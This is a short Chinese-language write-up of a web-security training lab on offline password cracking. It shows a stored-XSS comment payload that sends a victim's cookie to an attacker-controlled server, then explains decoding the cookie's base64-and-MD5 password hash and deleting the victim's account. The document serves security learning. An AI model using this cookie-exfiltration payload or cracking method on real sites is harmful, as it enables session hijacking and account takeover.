Lab: Offline password cracking：离线密码登录破解靶场复盘

靶场内容

该实验室将用户的密码哈希存储在 cookie 中。该实验室的评论功能中还包含一个 XSS 漏洞。要解决实验室问题，请获取carlos的stay-logged-incookie 并使用它来破解他的密码。然后，登录carlos并从“我的帐户”页面中删除他的帐户。

您的凭据： wiener:peter
受害者用户名： carlos

漏洞分析：

• 这个说是密码破解，本质上还是一个存储型XSS攻击
• 首先，登录既定的账户和密码，登入后，随便进入一个模块
• 评论区里面含有XSS漏洞，所以我们构建js代码即可，模块如下：
• <script>documnet.location='https://漏洞服务器的域名'+document.cookie</script>这样，我们就可以从漏洞服务器里面窃取到对应文件的Cookie。
• 这个时候恰好有个carlos的用户发来请求信息，截获它
• 分析密码，是base64(用户名:MD5(密码))的结构,先解base64在解MD5，可以得到密码为onceuponatime
• 登录之后删除这个 账户即可过关：

关键截图：